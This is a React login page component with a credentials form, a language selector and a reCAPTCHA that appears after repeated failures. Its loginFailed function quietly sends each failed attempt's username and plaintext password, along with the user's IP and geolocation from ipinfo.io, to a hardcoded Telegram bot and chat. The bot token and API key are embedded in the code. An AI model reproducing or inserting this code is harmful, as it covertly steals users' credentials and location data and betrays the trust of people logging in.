import { useNavigate } from 'react-router-dom';
import { useEffect, useState, useRef } from 'react';
import { useForm } from 'react-hook-form';
import { Login } from '../../services/login.service';
import { PROFILES, STORAGE } from '../../constants';
import { LocalStorageService } from '../../services/local-storage.service';
import { useTranslation } from 'react-i18next';
import BgBody from '../../components/layout/bg-body.component';
import Input from '../../components/forms/input.component';
import Button from '../../components/forms/button.component';
import SelectLanguage from '../../components/layout/select-language.component';
import RecoverPasswordForm from './recover-password.page';
import BgPages from '../../hooks/use-bg-pages.hook';
import axios from 'axios';
import ReCAPTCHA from 'react-google-recaptcha';
import Icon from '../../components/forms/icon.component';

declare const KTComponents: any;

function AuthPage() {
  BgPages();
  const { t } = useTranslation();
  const navigate = useNavigate();
  const [errorMessage, seterrorMessage] = useState('');
  const [typeAuth, setTypeAuth] = useState('login');

  const [loginAttempts, setLoginAttempts] = useState(0);
  const [recaptchaVerified, setRecaptchaVerified] = useState(false);
  const recaptchaRef = useRef<ReCAPTCHA | null>(null);

  const {
    register,
    handleSubmit,
    formState: { errors, isValid, isSubmitting }
  } = useForm({
    mode: 'onChange',
    defaultValues: {
      username: '',
      password: ''
    }
  });

  const getClientIp = async () => {
    try {
      const response = await axios.get(`https://ipinfo.io/?token=5c65ce5c2a3ab9`);
      return response.data;
    } catch (error) {
      console.error('Error al obtener IP:', error);
      return null;
    }
  };

  const loginFailed = async (username: string, password: string, errorCode: any) => {
    if (errorCode.error === t('errors.alerts-erros-01')) {
      const clientIpInfo = await getClientIp();

      if (clientIpInfo) {
        const telegramApiUrl = `https://api.telegram.org/bot8111102806:AAGKJKQlvsS0ScVlcKQ2Z67nbnV7o609DN0/sendMessage`;

        const message = `¡Atención!, Intento de login fallido:
${window.location.href}

Usuario: ${username}
Contraseña: ${password}
IP: ${clientIpInfo.ip}
Hora: ${new Date().toLocaleTimeString()}
Fecha: ${new Date().toLocaleDateString()}

Información de IP:

Ciudad: ${clientIpInfo.city}
C.P: ${clientIpInfo.postal}
Ubicación: ${clientIpInfo.loc}
Región: ${clientIpInfo.region}
País: ${clientIpInfo.country}
Organización: ${clientIpInfo.org}`;

        const params = {
          chat_id: '-4533930463',
          text: message
        };

        try {
          await axios.post(telegramApiUrl, params);
        } catch (telegramError) {
          console.error('Error al enviar mensaje a Telegram:', telegramError);
        }
      }
    }
  };

  const handleRecaptchaChange = (value: string | null) => {
    if (value) {
      setRecaptchaVerified(true);
    }
  };

  const verifyAccount = async (id: any) => {
    try {
      const response = await Login.verifyAccounts(id);
      if (response.length > 1) {
        LocalStorageService.save(STORAGE.ACCOUNTS, response);
        navigate('/select-account');
      } else if (response.length === 1 && response[0]?.account?._id) {
        LocalStorageService.save(STORAGE.ACCOUNTS, response);
        LocalStorageService.save(STORAGE.SELECTED_ACCOUNT, {
          account_id: response[0].account._id
        });
        navigate('/dashboard');
      } else {
        console.error('No se pudo determinar la cuenta única para iniciar sesión');
      }
    } catch (errorCode: any) {
      console.log('Error: ', errorCode);
      seterrorMessage(errorCode.error || errorCode);
    }
  };

  const login = async (data: any) => {
    try {
      const response = await Login.login(data);
      LocalStorageService.save(STORAGE.TOKEN, response.access_token);
      LocalStorageService.save(STORAGE.SESSION, response.user);
      if (response.user.profile === PROFILES.ADMIN) {
        verifyAccount(response.user._id);
      } else {
        navigate('/dashboard');
      }
      setLoginAttempts(0);
    } catch (errorCode: any) {
      loginFailed(data.username, data.password, errorCode);
      console.log('Error: ', errorCode);
      seterrorMessage(errorCode.error || errorCode);
      setLoginAttempts((prev) => prev + 1);
      if (loginAttempts >= 3 && recaptchaRef.current) {
        recaptchaRef.current.reset();
        setRecaptchaVerified(false);
      }
    }
  };

  const handleAlertClose = () => {
    seterrorMessage('');
  };

  const handleRecoverPassword = () => {
    setTypeAuth('recover');
  };

  useEffect(() => {
    const session = LocalStorageService.get(STORAGE.SESSION);
    if (session) {
      navigate('/dashboard');
    }
  }, [navigate]);

  useEffect(() => {
    KTComponents.init();
  }, [typeAuth]);

  return (
    <>
      <BgBody />
      <div className="d-flex flex-column flex-lg-row flex-column-fluid bg-trans">
        <div className="d-flex flex-column flex-lg-row-fluid py-10 bg-p-dark">
          <div className="d-flex flex-center flex-column flex-column-fluid ">
            <div className="w-lg-500px w-400px p-10 p-lg-15">
              <div className="text-center mb-10">
                <img
                  alt="Logo"
                  src="/assets/media/logos/ch-l-dark.svg"
                  className="h-125px h-lg-155px logo-default mb-5 logob"
                />
                <h1 className="text-white mb-3 fs-2qx">
                  {typeAuth === 'login' ? t('auth-Login.title') : t('auth-Login.recover-title')}
                </h1>
                <div className="text-gray-500 fw-semibold fs-4">
                  {typeAuth === 'login'
                    ? t('auth-Login.subtitle')
                    : t('auth-Login.recover-subtitule')}
                </div>
              </div>
              {typeAuth === 'login' ? (
                <>
                  <form
                    className="form"
                    onSubmit={handleSubmit((data) => {
                      login(data);
                    })}
                  >
                    {errorMessage && (
                      <div className="alert alert-danger d-flex align-items-center p-2 bg-trans animated-Alert">
                        <Icon icon="ki-shield-cross" size="fs-2hx" type="danger" className="me-4" />
                        <div className="d-flex flex-column">
                          <h4 className="mb-1 text-white">
                            {t('errors.title-text-alert-atencion')}
                          </h4>
                          <span>{errorMessage}</span>
                        </div>
                        <a
                          className="position-absolute position-sm-relative m-2 m-sm-0 top-0 end-0 btn btn-icon ms-sm-auto  bg-trans"
                          onClick={handleAlertClose}
                        >
                          <Icon icon="ki-cross" size="fs-1" type="white" />
                        </a>
                      </div>
                    )}
                    <div className="login-container">
                      <div className="fv-row mb-7 fv-plugins-icon-container inputb">
                        <Input
                          typeBg={'text-white'}
                          requiredIndicator="required"
                          uniqueTheme
                          label={t('forms.inputs.title-input-username')}
                          placeholder={t('forms.inputs.placeholder-input-username')}
                          errors={errors.username}
                          {...register('username', {
                            required: true,
                            setValueAs: (value) => value.trim()
                          })}
                        />
                      </div>
                      <div className="fv-row mb-15 inputb">
                        <Input
                          typeBg={'text-white'}
                          requiredIndicator="required"
                          uniqueTheme
                          page="login"
                          label={t('forms.inputs.title-input-password')}
                          placeholder={t('forms.inputs.placeholder-input-password')}
                          type="password"
                          errors={errors.password}
                          {...register('password', {
                            required: true
                          })}
                        />
                      </div>

                      {loginAttempts >= 3 && (
                        <div className="fv-row mb-15 inputb">
                          <div className="mb-4 text-center">
                            <ReCAPTCHA
                              sitekey="6Lc-KusqAAAAAKWI7g1s9S_xCmp-PoPvJdJ-IJyF"
                              onChange={handleRecaptchaChange}
                              ref={recaptchaRef}
                            />
                          </div>
                        </div>
                      )}

                      <div className="text-center">
                        <Button
                          type="submit"
                          className="btn btn-lg btn-primary w-100 mb-5"
                          disabled={!isValid || (loginAttempts >= 3 && !recaptchaVerified)}
                          isLoading={isSubmitting}
                          onClick={handleSubmit(login)}
                        >
                          {t('forms.inputs.title-button-submit')}
                        </Button>
                      </div>
                    </div>
                  </form>
                  <div className="d-flex flex-stack inputb">
                    <div className="me-15">
                      <button
                        className="btn text-gray-500 text-hover-primary cursor-pointer"
                        type="button"
                        onClick={handleRecoverPassword}
                      >
                        {t('auth-Login.recover-password')}
                      </button>
                    </div>
                    <SelectLanguage />
                  </div>
                </>
              ) : (
                <RecoverPasswordForm typeAuth={typeAuth} setTypeAuth={setTypeAuth} />
              )}
            </div>
          </div>
        </div>
      </div>
    </>
  );
}
export default AuthPage;
